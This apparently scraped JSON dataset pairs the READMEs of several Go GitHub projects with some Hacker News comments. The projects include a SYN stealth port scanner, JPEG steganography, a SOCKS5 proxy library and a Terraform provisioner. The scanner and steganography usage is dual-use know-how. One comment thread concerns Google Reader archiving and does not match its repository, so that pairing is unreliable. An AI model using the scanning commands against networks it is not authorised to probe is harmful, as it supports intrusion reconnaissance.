github.com/liamg/furious\n```\n\n## Options\n\n### `-s [TYPE]` `--scan-type [TYPE]`\n\nUse the specified scan type. The options are:\n\n| Type | Description |\n|------------|-------------|\n| `syn` | A SYN/stealth scan. 
Most efficient scan type, using only a partial TCP handshake. Requires root privileges.\n| `connect` | A less detailed scan using full TCP handshakes, though does not require root privileges. \n| `device` | Attempt to identify device MAC address and manufacturer where possible. Useful for listing devices on a LAN.\n\nThe default is a SYN scan.\n\n### `-p [PORTS]` `--ports [PORTS]`\n\nScan the specified ports. Defaults to a list of all known ports as [provided by IANA](https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml).\n\nPorts may be specified using a comma delimited list, and ranges are also allowed.\n\nFor example:\n\n```\n--ports 22,80,443,8080-8082\n```\n\n...will scan 22, 80, 443, 8080, 8081, and 8082.\n\n### `-t [MS]` `--timout-ms [MS]`\n\nThe network timeout to apply to each port being checked. Default is *1000ms*.\n\n### `-w [COUNT]` `--workers [COUNT]`\n\nThe number of worker routines to use to scan ports in parallel. Default is *1000* workers.\n\n### `-u` `--up-only`\n\nOnly show output for hosts that are confirmed as up.\n\n### `--version`\n\nOutput version information and exit.\n\n## Usage\n\nFurious can be used to:\n\n### Find open ports on one or more hosts\n\nScan a single host:\n```\nfurious 192.168.1.4 \n```\n\nScan a whole CIDR:\n```\nfurious 192.168.1.0/24 \n```\n\n### Scan a mixture of IPs, hostnames and CIDRs\n\n```\nfurious -s connect 8.8.8.8 192.168.1.1/24 google.com\n```\n\n### Run a SYN (stealth) scan (with root privileges)\n\n```\nsudo -E furious -s syn 192.168.1.1\n```\n\n### Run a connect scan as any user\n\n```\nfurious -s connect 192.168.1.1\n```\n\n### Identify device MAC address and manufacturer within a local network\n\n```\nfurious -s device 192.168.1.1/24 -u\n```\n\n## Troubleshooting\n\n### `sudo: furious: command not found`\n\nIf you installed using go, your user has the environment variables required to locate go programs, but root does not. You need to:\n\n```\nsudo env \"PATH=$PATH\" furious\n```\n\n## SYN/Connect scans are slower than nmap!\n\nThey're not in my experience, but with default arguments furious scans nearly six times as many ports as nmap does by default.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jonmorehouse/terraform-provisioner-ansible", "link": "https://github.com/jonmorehouse/terraform-provisioner-ansible", "tags": [], "stars": 524, "description": "A provisioner for bootstrapping terraform resources with ansible", "lang": "Go", "repo_lang": "", "readme": "# terraform-provisioner-ansible\n> Provision terraform resources with ansible\n\n## Overview\n\n**[Terraform](https://github.com/hashicorp/terraform)** is a tool for automating infrastructure. Terraform includes the ability to provision resources at creation time through a plugin api. Currently, some builtin [provisioners](https://www.terraform.io/docs/provisioners/) such as **chef** and standard scripts are provided; this provisioner introduces the ability to provision an instance at creation time with **ansible**.\n\nThis provisioner provides the ability to apply **host-groups**, **plays** or **roles** against a host at provision time. Ansible is run on the host itself and this provisioner configures a dynamic inventory on the fly as resources are created.\n\n**terraform-provisioner-ansible** is shipped as a **Terraform** [module](https://www.terraform.io/docs/modules/create.html). 
To include it, simply download the binary and enable it as a terraform module in your **terraformrc**.\n\n## Installation\n\n**terraform-provisioner-ansible** ships as a single binary and is compatible with **terraform**'s plugin interface. Behind the scenes, terraform plugins use https://github.com/hashicorp/go-plugin and communicate with the parent terraform process via RPC.\n\nTo install, download and un-archive the binary and place it on your path.\n\n```bash\n$ https://github.com/jonmorehouse/terraform-provisioner-ansible/releases/download/0.0.1-terraform-provisioner-ansible.tar.gz\n\n$ tar -xvf 0.0.1-terraform-provisioner-ansible.tar.gz /usr/local/bin\n```\n\nOnce installed, a `~/.terraformrc` file is used to _enable_ the plugin.\n\n```bash\nproviders {\n ansible = \"/usr/local/bin/terraform-provisioner-ansible\"\n}\n```\n\n## Usage\n\nOnce installed, you can provision resources by including an `ansible` provisioner block.\n\nThe following example demonstrates a configuration block to apply a host group's plays to new instances. You can specify a list of hostgroups and a list of plays to specify which ansible tasks to perform on the host.\n\nAdditionally, `groups` and `extra_vars` are accessible to resolve variables and group the new host in ansible.\n\n```\n{\n resource \"aws_instance\" \"terraform-provisioner-ansible-example\" {\n ami = \"ami-408c7f28\"\n instance_type = \"t1.micro\"\n\n provisioner \"ansible\" {\n connection {\n user = \"ubuntu\"\n }\n\n playbook = \"ansible/playbook.yml\"\n groups = [\"all\"]\n hosts = [\"terraform\"]\n extra_vars = {\n \"env\": \"terraform\" \n }\n }\n }\n}\n```\n\nCheck out [example](example/) for a more detailed walkthrough of the provisioner and how to provision resources with **ansible**.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "slicebit/qb", "link": "https://github.com/slicebit/qb", "tags": ["golang", "go", "database", "db", "orm", "sql", "sqlite3", "sqlalchemy", "postgresql", "mysql"], "stars": 523, "description": "The database toolkit for go", "lang": "Go", "repo_lang": "", "readme": "![alt text](https://github.com/slicebit/qb/raw/master/qb_logo_128.png \"qb: the database toolkit for go\")\n\n# qb - the database toolkit for go\n\n[![Build Status](https://travis-ci.org/slicebit/qb.svg?branch=master)](https://travis-ci.org/slicebit/qb)\n[![Coverage Status](https://coveralls.io/repos/github/slicebit/qb/badge.svg?branch=master)](https://coveralls.io/github/slicebit/qb?branch=master)\n[![License (LGPL version 2.1)](https://img.shields.io/badge/license-GNU%20LGPL%20version%202.1-brightgreen.svg?style=flat)](http://opensource.org/licenses/LGPL-2.1)\n[![Go Report Card](https://goreportcard.com/badge/github.com/slicebit/qb)](https://goreportcard.com/report/github.com/slicebit/qb)\n[![GoDoc](https://godoc.org/github.com/golang/gddo?status.svg)](http://godoc.org/github.com/slicebit/qb)\n\n**This project is currently pre 1.**\n\nCurrently, it's not feature complete. It can have potential bugs. There are no tests covering concurrency race conditions. It can crash especially in concurrency.\nBefore 1.x releases, each major release could break backwards compatibility.\n\nAbout qb\n--------\nqb is a database toolkit for easier db queries in go. It is inspired from python's best orm, namely sqlalchemy. qb is an orm(sqlx) as well as a query builder. 
It is quite modular in case of using just expression api and query building stuff.\n\n[Documentation](https://qb.readme.io)\n-------------\nThe documentation is hosted in [readme.io](https://qb.readme.io) which has great support for markdown docs. Currently, the docs are about 80% - 90% complete. The doc files will be added to this repo soon. Moreover, you can check the godoc from [here](https://godoc.org/github.com/slicebit/qb). Contributions & Feedbacks in docs are welcome.\n\nFeatures\n--------\n- Support for postgres(9.5.+), mysql & sqlite3\n- Powerful expression API for building queries & table ddls\n- Struct to table ddl mapper where initial table migrations can happen\n- Transactional session api that auto map structs to queries\n- Foreign key definitions\n- Single & Composite column indices\n- Relationships (soon.. probably in 0.3 milestone)\n\nInstallation\n------------\n```sh\ngo get -u github.com/slicebit/qb\n```\nIf you want to install test dependencies then;\n```sh\ngo get -u -t github.com/slicebit/qb\n```\n\nQuick Start\n-----------\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/slicebit/qb\"\n\t_ \"github.com/mattn/go-sqlite3\"\n _ \"github.com/slicebit/qb/dialects/sqlite\"\n)\n\ntype User struct {\n\tID string `db:\"id\"`\n\tEmail string `db:\"email\"`\n\tFullName string `db:\"full_name\"`\n\tOscars int `db:\"oscars\"`\n}\n\nfunc main() {\n\n\tusers := qb.Table(\n\t\t\"users\",\n\t\tqb.Column(\"id\", qb.Varchar().Size(40)),\n\t\tqb.Column(\"email\", qb.Varchar()).NotNull().Unique(),\n\t\tqb.Column(\"full_name\", qb.Varchar()).NotNull(),\n\t\tqb.Column(\"oscars\", qb.Int()).NotNull().Default(0),\n\t\tqb.PrimaryKey(\"id\"),\n\t)\n\n\tdb, err := qb.New(\"sqlite3\", \"./qb_test.db\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tdefer db.Close()\n\n\tmetadata := qb.MetaData()\n\n\t// add table to metadata\n\tmetadata.AddTable(users)\n\n\t// create all tables registered to metadata\n\tmetadata.CreateAll(db)\n\tdefer metadata.DropAll(db) // drops all tables\n\n\tins := qb.Insert(users).Values(map[string]interface{}{\n\t\t\"id\": \"b6f8bfe3-a830-441a-a097-1777e6bfae95\",\n\t\t\"email\": \"jack@nicholson.com\",\n\t\t\"full_name\": \"Jack Nicholson\",\n\t})\n\n\t_, err = db.Exec(ins)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// find user\n\tvar user User\n\n\tsel := qb.Select(users.C(\"id\"), users.C(\"email\"), users.C(\"full_name\")).\n\t\tFrom(users).\n\t\tWhere(users.C(\"id\").Eq(\"b6f8bfe3-a830-441a-a097-1777e6bfae95\"))\n\n\terr = db.Get(sel, &user)\n\tfmt.Printf(\"%+v\\n\", user)\n}\n```\n\nCredits\n-------\n- [Aras Can Ak\u0131n](https://github.com/aacanakin)\n- [Christophe de Vienne](https://github.com/cdevienne)\n- [Onur \u015eent\u00fcre](https://github.com/onursenture)\n- [Aaron O. 
Ellis](https://github.com/aodin)\n- [Shawn Smith](https://github.com/shawnps)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lukechampine/jsteg", "link": "https://github.com/lukechampine/jsteg", "tags": ["steganography", "jpeg"], "stars": 523, "description": "JPEG steganography", "lang": "Go", "repo_lang": "", "readme": "jsteg\n-----\n\n[![GoDoc](https://godoc.org/lukechampine.com/jsteg?status.svg)](https://godoc.org/lukechampine.com/jsteg)\n[![Go Report Card](http://goreportcard.com/badge/lukechampine.com/jsteg)](https://goreportcard.com/report/lukechampine.com/jsteg)\n\n```\ngo get lukechampine.com/jsteg\n```\n\n`jsteg` is a package for hiding data inside jpeg files, a technique known as\n[steganography](https://en.wikipedia.org/wiki/steganography). This is accomplished\nby copying each bit of the data into the least-significant bits of the image.\nThe amount of data that can be hidden depends on the filesize of the jpeg; it\ntakes about 10-14 bytes of jpeg to store each byte of the hidden data.\n\n## Example\n\n```go\n// open an existing jpeg\nf, _ := os.Open(filename)\nimg, _ := jpeg.Decode(f)\n\n// add hidden data to it\nout, _ := os.Create(outfilename)\ndata := []byte(\"my secret data\")\njsteg.Hide(out, img, data, nil)\n\n// read hidden data:\nhidden, _ := jsteg.Reveal(out)\n```\n\nNote that the data is not demarcated in any way; the caller is responsible for\ndetermining which bytes of `hidden` it cares about. The easiest way to do this\nis to prepend the data with its length.\n\nA `jsteg` command is included, providing a simple wrapper around the\nfunctions of this package. It can hide and reveal data in jpeg files and\nsupports input/output redirection. It automatically handles length prefixes\nand uses a magic header to identify jpegs that were produced by `jsteg`.\n\nA more narrowly-focused command named `slink` is also included. `slink` embeds\na public key in a jpeg, and makes it easy to sign data and verify signatures\nusing keypairs derived from password strings. 
See [cmd/slink](cmd/slink) for a\nfull description.\n\nBinaries for both commands can be found [here](https://github.com/lukechampine/jsteg/releases).\n\n---\n\nThis package reuses a significant amount of code from the image/jpeg package.\nThe BSD-style license that governs the use of that code can be found in the\n`go_LICENSE` file.\n", "readme_type": "markdown", "hn_comments": "More about the JSTEG algorithm:\nhttps://pdfs.semanticscholar.org/8893/ba76f2e358e80ef5bd93e4...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "helm/chart-releaser", "link": "https://github.com/helm/chart-releaser", "tags": ["helm", "charts", "kubernetes", "repository", "hosting"], "stars": 523, "description": "Hosting Helm Charts via GitHub Pages and Releases", "lang": "Go", "repo_lang": "", "readme": "# Chart Releaser\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n![CI](https://github.com/helm/chart-releaser/workflows/CI/badge.svg?branch=main&event=push)\n\n**Helps Turn GitHub Repositories into Helm Chart Repositories**\n\n`cr` is a tool designed to help GitHub repos self-host their own chart repos by adding Helm chart artifacts to GitHub Releases named for the chart version and then creating an `index.yaml` file for those releases that can be hosted on GitHub Pages (or elsewhere!).\n\n## Installation\n\n### Binaries (recommended)\n\nDownload your preferred asset from the [releases page](https://github.com/helm/chart-releaser/releases) and install manually.\n\n### Homebrew\n\n```console\n$ brew tap helm/tap\n$ brew install chart-releaser\n```\n\n### Go get (for contributing)\n\n```console\n$ # clone repo to some directory outside GOPATH\n$ git clone https://github.com/helm/chart-releaser\n$ cd chart-releaser\n$ go mod download\n$ go install ./...\n```\n\n### Docker (for Continuous Integration)\n\nDocker images are pushed to the [helmpack/chart-releaser](https://quay.io/repository/helmpack/chart-releaser?tab=tags) Quay container registry. The Docker image is built on top of Alpine and its default entry-point is `cr`. See the [Dockerfile](./Dockerfile) for more details.\n\n## Usage\n\nCurrently, `cr` can create GitHub Releases from a set of charts packaged up into a directory and create an `index.yaml` file for the chart repository from GitHub Releases.\n\n```console\n$ cr --help\nCreate Helm chart repositories on GitHub Pages by uploading Chart packages\nand Chart metadata to GitHub Releases and creating a suitable index file\n\nUsage:\n cr [command]\n\nAvailable Commands:\n completion generate the autocompletion script for the specified shell\n help Help about any command\n index Update Helm repo index.yaml for the given GitHub repo\n package Package Helm charts\n upload Upload Helm chart packages to GitHub Releases\n version Print version information\n\nFlags:\n --config string Config file (default is $HOME/.cr.yaml)\n -h, --help help for cr\n\nUse \"cr [command] --help\" for more information about a command.\n```\n\n### Create GitHub Releases from Helm Chart Packages\n\nScans a path for Helm chart packages and creates releases in the specified GitHub repo uploading the packages.\n\n```console\n$ cr upload --help\nUpload Helm chart packages to GitHub Releases\n\nUsage:\n cr upload [flags]\n\nFlags:\n -c, --commit string Target commit for release\n --generate-release-notes Whether to automatically generate the name and body for this release. 
See https://docs.github.com/en/rest/releases/releases\n -b, --git-base-url string GitHub Base URL (only needed for private GitHub) (default \"https://api.github.com/\")\n -r, --git-repo string GitHub repository\n -u, --git-upload-url string GitHub Upload URL (only needed for private GitHub) (default \"https://uploads.github.com/\")\n -h, --help help for upload\n -o, --owner string GitHub username or organization\n -p, --package-path string Path to directory with chart packages (default \".cr-release-packages\")\n --release-name-template string Go template for computing release names, using chart metadata (default \"{{ .Name }}-{{ .Version }}\")\n --release-notes-file string Markdown file with chart release notes. If it is set to empty string, or the file is not found, the chart description will be used instead. The file is read from the chart package\n --skip-existing Skip upload if release exists\n -t, --token string GitHub Auth Token\n --make-release-latest bool Mark the created GitHub release as 'latest' (default \"true\")\n\nGlobal Flags:\n --config string Config file (default is $HOME/.cr.yaml)\n```\n\n### Create the Repository Index from GitHub Releases\n\nOnce uploaded you can create an `index.yaml` file that can be hosted on GitHub Pages (or elsewhere).\n\n```console\n$ cr index --help\nUpdate a Helm chart repository index.yaml file based on a the\ngiven GitHub repository's releases.\n\nUsage:\n cr index [flags]\n\nFlags:\n -b, --git-base-url string GitHub Base URL (only needed for private GitHub) (default \"https://api.github.com/\")\n -r, --git-repo string GitHub repository\n -u, --git-upload-url string GitHub Upload URL (only needed for private GitHub) (default \"https://uploads.github.com/\")\n -h, --help help for index\n -i, --index-path string Path to index file (default \".cr-index/index.yaml\")\n -o, --owner string GitHub username or organization\n -p, --package-path string Path to directory with chart packages (default \".cr-release-packages\")\n --pages-branch string The GitHub pages branch (default \"gh-pages\")\n --pages-index-path string The GitHub pages index path (default \"index.yaml\")\n --pr Create a pull request for index.yaml against the GitHub Pages branch (must not be set if --push is set)\n --push Push index.yaml to the GitHub Pages branch (must not be set if --pr is set)\n --release-name-template string Go template for computing release names, using chart metadata (default \"{{ .Name }}-{{ .Version }}\")\n --remote string The Git remote used when creating a local worktree for the GitHub Pages branch (default \"origin\")\n -t, --token string GitHub Auth Token (only needed for private repos)\n\nGlobal Flags:\n --config string Config file (default is $HOME/.cr.yaml)\n```\n\n## Configuration\n\n`cr` is a command-line application.\nAll command-line flags can also be set via environment variables or config file.\nEnvironment variables must be prefixed with `CR_`.\nUnderscores must be used instead of hyphens.\n\nCLI flags, environment variables, and a config file can be mixed.\nThe following order of precedence applies:\n\n1. CLI flags\n1. Environment variables\n1. 
Config file\n\n### Examples\n\nThe following example show various ways of configuring the same thing:\n\n#### CLI\n\n cr upload --owner myaccount --git-repo helm-charts --package-path .deploy --token 123456789\n\n#### Environment Variables\n\n export CR_OWNER=myaccount\n export CR_GIT_REPO=helm-charts\n export CR_PACKAGE_PATH=.deploy\n export CR_TOKEN=\"123456789\"\n export CR_GIT_BASE_URL=\"https://api.github.com/\"\n export CR_GIT_UPLOAD_URL=\"https://uploads.github.com/\"\n export CR_SKIP_EXISTING=true\n\n cr upload\n\n#### Config File\n\n`config.yaml`:\n\n```yaml\nowner: myaccount\ngit-repo: helm-charts\npackage-path: .deploy\ntoken: 123456789\ngit-base-url: https://api.github.com/\ngit-upload-url: https://uploads.github.com/\n```\n\n#### Config Usage\n\n cr upload --config config.yaml\n\n\n`cr` supports any format [Viper](https://github.com/spf13/viper) can read, i. e. JSON, TOML, YAML, HCL, and Java properties files.\n\nNotice that if no config file is specified, `cr.yaml` (or any of the supported formats) is loaded from the current directory, `$HOME/.cr`, or `/etc/cr`, in that order, if found.\n\n#### Notes for Github Enterprise Users\n\nFor Github Enterprise, `chart-releaser` users need to set `git-base-url` and `git-upload-url` correctly, but the correct values are not always obvious to endusers.\n\nBy default they are often along these lines:\n\n```\nhttps://ghe.example.com/api/v3/\nhttps://ghe.example.com/api/uploads/\n```\n\nIf you are trying to figure out what your `upload_url` is try to use a curl command like this:\n`curl -u username:token https://example.com/api/v3/repos/org/repo/releases`\nand then look for `upload_url`. You need the part of the URL that appears before `repos/` in the path.\n\n##### Known Bug\n\nCurrently, if you set the upload URL incorrectly, let's say to something like `https://example.com/uploads/`, then `cr upload` will appear to work, but the release will not be complete. When everything is working there should be 3 assets in each release, but instead there will only be the 2 source code assets. The third asset, which is what helm actually uses, is missing. This issue will become apparent when you run `cr index` and it always claims that nothing has changed, because it can't find the asset it expects for the release.\n\nIt appears like the [go-github Do call](https://github.com/google/go-github/blob/master/github/github.go#L520) does not catch the fact that the upload URL is incorrect and pass back the expected error. If the asset upload fails, it would be better if the release was rolled back (deleted) and an appropriate log message is be displayed to the user.\n\nThe `cr index` command should also generate a warning when a release has no assets attached to it, to help people detect and troubleshoot this type of problem.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kellegous/go", "link": "https://github.com/kellegous/go", "tags": [], "stars": 522, "description": "Another Google-like Go short link service", "lang": "Go", "repo_lang": "", "readme": "# A \"go\" short-link service\n\n## Background\nThe first time I encountered \"go\" links was at Google. Anyone on the corporate\nnetwork could register a URL shortcut and it would redirect the user to the\nappropriate page. 
So for instance, if you wanted to find out more about BigTable,\nyou simply directed your browser at http://go/bigtable and you would be redirected to\nsomething about the BigTable data storage system. I was later told that the\nfirst go service at Google was written by [Benjamin Staffin](https://www.linkedin.com/in/benjaminstaffin)\nto end the never-ending stream of requests for internal CNAME entries. He\ndescribed it as AOL keywords for the corporate network. These days if you go to\nany reasonably sized company, you are likely to find a similar system. Etsy made\none after seeing that Twitter had one ... it's a contagious and useful little\ntool. So contagious, in fact, that many former Googlers that I know have built\nor contributed to a similar system post-Google. I am no different, this is my\n\"go\" link service.\n\nOne slight difference between this go service and Google's is that this one is also\ncapable of generating short links for you.\n\n## Installation\nThis tool is written in Go (ironically) and can be easily installed and started\nwith the following commands.\n\n```\nGOPATH=`pwd` go install github.com/kellegous/go\nbin/go\n```\n\nBy default, the service will put all of its data in the directory `data` and will\nlisten to requests on the port `8067`. Both of these, however, are easily configured\nusing the `--data=/path/to/data` and `--addr=:80` command line flags.\n\n## DNS Setup\nTo get the most benefit from the service, you should setup a DNS entry on your\nlocal network, `go.corp.mycompany.com`. Make sure that corp.mycompany.com is in\nthe search domains for each user on the network. This is usually easily accomplished\nby configuring your DHCP server. Now, simply typing \"go\" into your browser should\ntake you to the service, where you can register shortcuts. Obviously, those\nshortcuts will also be available by typing \"go/shortcut\".\n\n## Using the Service\nOnce you have it all setup, using it is pretty straight-forward.\n\n#### Create a new shortcut\nType `go/edit/my-shortcut` and enter the URL.\n\n#### Visit a shortcut\nType `go/my-shortcut` and you'll be redirected to the URL.\n\n#### Shorten a URL\nType `go` and enter the URL.\n", "readme_type": "markdown", "hn_comments": "ArchiveTeam is extracting all the data from Google Reader and uploading it to the Internet Archive. Help out by submitting your OPML file: https://news.ycombinator.com/item?id=5958119Thanks mihaip!Worked successfully in Windows CMD for me, without using the \\bin shell script: cd C:\\mihaip-readerisdead\n set PYTHON_HOME=C:\\mihaip-readerisdead\n C:\\path-to-py27 reader_archive\\reader_archive.py --output-directory C:\\mystuff\n\nLocked up at 251K out of 253K items for me, though. Restarting... success! Looks like it might have locked up trying to start the \"Fetching comments\" section on my first try.I guess archived RSS data for me isn't terribly important since most people seem to hide the rest of their content behind a \"More\" link to get those precious ad views.Warning to other impatient users:I didn't read the instructions too well, so the half hour I spent carefully deleting gigantic/uninteresting feeds out of my subscriptions.xml file was all for naught. 
Because I didn't know I needed to specify the opml_file on the command line, the script just logged into my Reader account (i.e., it walked me through the browser-based authorization process) and downloaded my subscriptions from there -- including all the gigantic/uninteresting subscriptions that I did NOT care to download.So now I've gone and downloaded 2,592,159 items, consuming 13 GB of space.I'm NOT complaining -- I actually think it's AWESOME that this is possible -- but if you don't want to download millions of items, be sure to read the instructions and use the opml_file directive.If this does what I think it does(And it seems to be doing it now on my machine), then this is truly, truly awesome.Thank you. mihaip, if you are ever in Houston I will buy you a beer/ and or a steak dinner.This is excellent, thank you for making this! I'm using it right now to make an offline archive of my Reader stuff.My only gripe would be the tool's inability to continue after a partial run, but since I won't be using this more than once that's probably OK.All web services should have a handy CLI extraction tool, preferably one that can be run from a CRON call. On that note, I'm very happy with gm_vault, as well.Edit: getting a lot of XML parse errors, by the way.Thank you for this!\nNow I can procrastinate on my own reader app for much longer :)Should we be concerned with errors like this? [W 130629 03:11:54 api:254] Requested item id tag:google.com,2005:reader/item/afe90dad8acde78b (-5771066408489326709), but it was not found in the result\n\nI'm getting ~1-2 per \"Fetch N/M item bodies\" line.This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.I'm getting \"ImportError: No module named site\"echo %pythonpath% gives c:\\readerisdeadI copied 'base' from the readerisdead zipfile to c:\\python27\\lib & also copied the base folder into the same folder as reader_archive.pyC:\\readerisdead\\reader_archive\\reader_archive.py --output-directory C:\\googlereader gives \"ImportError: No module named site\"What am I doing wrong? How can I get this to work?
The title has it right. I never knew this existed, but it seems like something I've been looking for... Is it worth trying out at its current (open) state? Or is it just another failed Google Lab experiment?I smell DART in the air.\nThis won't be the last JS app they will abandon.I'm assuming this was the \"Brightly\" from that leaked Dart memo[0] some time back. Disappointing, I was a little excited to see what Google could bring to the IDE space.[0] https://gist.github.com/1208618/", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "trezor/blockbook", "link": "https://github.com/trezor/blockbook", "tags": ["bitcoin", "backend", "trezor"], "stars": 522, "description": ":blue_book: Trezor address/account balance backend ", "lang": "Go", "repo_lang": "", "readme": "[![Go Report Card](https://goreportcard.com/badge/trezor/blockbook)](https://goreportcard.com/report/trezor/blockbook)\n\n# Blockbook\n\n**Blockbook** is back-end service for Trezor wallet. Main features of **Blockbook** are:\n\n- index of addresses and address balances of the connected block chain\n- fast index search\n- simple blockchain explorer\n- websocket, API and legacy Bitcore Insight compatible socket.io interfaces\n- support of multiple coins (Bitcoin and Ethereum type) with easy extensibility to other coins\n- scripts for easy creation of debian packages for backend and blockbook\n\n## Build and installation instructions\n\nOfficially supported platform is **Debian Linux** and **AMD64** architecture.\n\nMemory and disk requirements for initial synchronization of **Bitcoin mainnet** are around 32 GB RAM and over 180 GB of disk space. After initial synchronization, fully synchronized instance uses about 10 GB RAM.\nOther coins should have lower requirements, depending on the size of their block chain. Note that fast SSD disks are highly\nrecommended.\n\nUser installation guide is [here](https://wiki.trezor.io/User_manual:Running_a_local_instance_of_Trezor_Wallet_backend_(Blockbook)).\n\nDeveloper build guide is [here](/docs/build.md).\n\nContribution guide is [here](CONTRIBUTING.md).\n\n## Implemented coins\n\nBlockbook currently supports over 30 coins. 
The Trezor team implemented \n\n- Bitcoin, Bitcoin Cash, Zcash, Dash, Litecoin, Bitcoin Gold, Ethereum, Ethereum Classic, Dogecoin, Namecoin, Vertcoin, DigiByte, Liquid\n\nthe rest of coins were implemented by the community.\n\nTestnets for some coins are also supported, for example:\n- Bitcoin Testnet, Bitcoin Cash Testnet, ZCash Testnet, Ethereum Testnet Ropsten\n\nList of all implemented coins is in [the registry of ports](/docs/ports.md).\n\n## Common issues when running Blockbook or implementing additional coins\n\n#### Out of memory when doing initial synchronization\n\nHow to reduce memory footprint of the initial sync: \n\n- disable rocksdb cache by parameter `-dbcache=0`, the default size is 500MB\n- run blockbook with parameter `-workers=1`. This disables bulk import mode, which caches a lot of data in memory (not in rocksdb cache). It will run about twice as slowly but especially for smaller blockchains it is no problem at all.\n\nPlease add your experience to this [issue](https://github.com/trezor/blockbook/issues/43).\n\n#### Error `internalState: database is in inconsistent state and cannot be used`\n\nBlockbook was killed during the initial import, most commonly by OOM killer. \nBy default, Blockbook performs the initial import in bulk import mode, which for performance reasons does not store all data immediately to the database. If Blockbook is killed during this phase, the database is left in an inconsistent state. \n\nSee above how to reduce the memory footprint, delete the database files and run the import again. \n\nCheck [this](https://github.com/trezor/blockbook/issues/89) or [this](https://github.com/trezor/blockbook/issues/147) issue for more info.\n\n#### Running on Ubuntu\n\n[This issue](https://github.com/trezor/blockbook/issues/45) discusses how to run Blockbook on Ubuntu. If you have some additional experience with Blockbook on Ubuntu, please add it to [this issue](https://github.com/trezor/blockbook/issues/45).\n\n#### My coin implementation is reporting parse errors when importing blockchain\n\nYour coin's block/transaction data may not be compatible with `BitcoinParser` `ParseBlock`/`ParseTx`, which is used by default. In that case, implement your coin in a similar way we used in case of [zcash](https://github.com/trezor/blockbook/tree/master/bchain/coins/zec) and some other coins. The principle is not to parse the block/transaction data in Blockbook but instead to get parsed transactions as json from the backend.\n\n## Data storage in RocksDB\n\nBlockbook stores data the key-value store RocksDB. Database format is described [here](/docs/rocksdb.md).\n\n## API\n\nBlockbook API is described [here](/docs/api.md).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "txthinking/socks5", "link": "https://github.com/txthinking/socks5", "tags": ["socks", "socks5", "socks-protocol", "proxy"], "stars": 522, "description": "SOCKS Protocol Version 5 Library in Go. 
Full TCP/UDP and IPv4/IPv6 support", "lang": "Go", "repo_lang": "", "readme": "## socks5\n\n[English](README.md)\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/txthinking/socks5)](https://goreportcard.com/report/github.com/txthinking/socks5)\n[![GoDoc](https://godoc.org/github.com/txthinking/socks5?status.svg)](https://godoc.org/github.com/txthinking/socks5)\n\n[\ud83d\udde3 News](https://t.me/txthinking_news)\n[\ud83e\ude78 Youtube](https://www.youtube.com/txthinking)\n[\u2764\ufe0f Sponsor](https://github.com/sponsors/txthinking)\n\nSOCKS Protocol Version 5 Library.\n\nFull TCP/UDP and IPv4/IPv6 support.\nGoal: KISS, less is more, small API, code is like the original protocol.\n\n\u2764\ufe0f A project by [txthinking.com](https://www.txthinking.com)\n\n### Install\n```\n$ go get github.com/txthinking/socks5\n```\n\n### Struct concepts map to the concepts in the original protocol\n\n* Negotiation:\n * `type NegotiationRequest struct`\n * `func NewNegotiationRequest(methods []byte)`, in client\n * `func (r *NegotiationRequest) WriteTo(w io.Writer)`, client writes to server\n * `func NewNegotiationRequestFrom(r io.Reader)`, server reads from client\n * `type NegotiationReply struct`\n * `func NewNegotiationReply(method byte)`, in server\n * `func (r *NegotiationReply) WriteTo(w io.Writer)`, server writes to client\n * `func NewNegotiationReplyFrom(r io.Reader)`, client reads from server\n* User and password negotiation:\n * `type UserPassNegotiationRequest struct`\n * `func NewUserPassNegotiationRequest(username []byte, password []byte)`, in client\n * `func (r *UserPassNegotiationRequest) WriteTo(w io.Writer)`, client writes to server\n * `func NewUserPassNegotiationRequestFrom(r io.Reader)`, server reads from client\n * `type UserPassNegotiationReply struct`\n * `func NewUserPassNegotiationReply(status byte)`, in server\n * `func (r *UserPassNegotiationReply) WriteTo(w io.Writer)`, server writes to client\n * `func NewUserPassNegotiationReplyFrom(r io.Reader)`, client reads from server\n* Request:\n * `type Request struct`\n * `func NewRequest(cmd byte, atyp byte, dstaddr []byte, dstport []byte)`, in client\n * `func (r *Request) WriteTo(w io.Writer)`, client writes to server\n * `func NewRequestFrom(r io.Reader)`, server reads from client\n * After server gets the client's *Request, processes...\n* Reply:\n * `type Reply struct`\n * `func NewReply(rep byte, atyp byte, bndaddr []byte, bndport []byte)`, in server\n * `func (r *Reply) WriteTo(w io.Writer)`, server writes to client\n * `func NewReplyFrom(r io.Reader)`, client reads from server\n* Datagram:\n * `type Datagram struct`\n * `func NewDatagram(atyp byte, dstaddr []byte, dstport []byte, data []byte)`\n * `func NewDatagramFromBytes(bb []byte)`\n * `func (d *Datagram) Bytes()`\n\n### High-level API\n\n> This covers the classic use cases; for special cases, it is recommended to pick the small APIs above and customize.\n\n**Server**: supports UDP and TCP\n\n* `type Server struct`\n* `type Handler interface`\n * `TCPHandle(*Server, *net.TCPConn, *Request) error`\n * `UDPHandle(*Server, *net.UDPAddr, *Datagram) error`\n\nExample:\n\n```\nserver, _ := NewClassicServer(addr, ip, username, password, tcpTimeout, udpTimeout)\nserver.ListenAndServe(Handler)\n```\n\n**Client**: supports TCP and UDP, returns 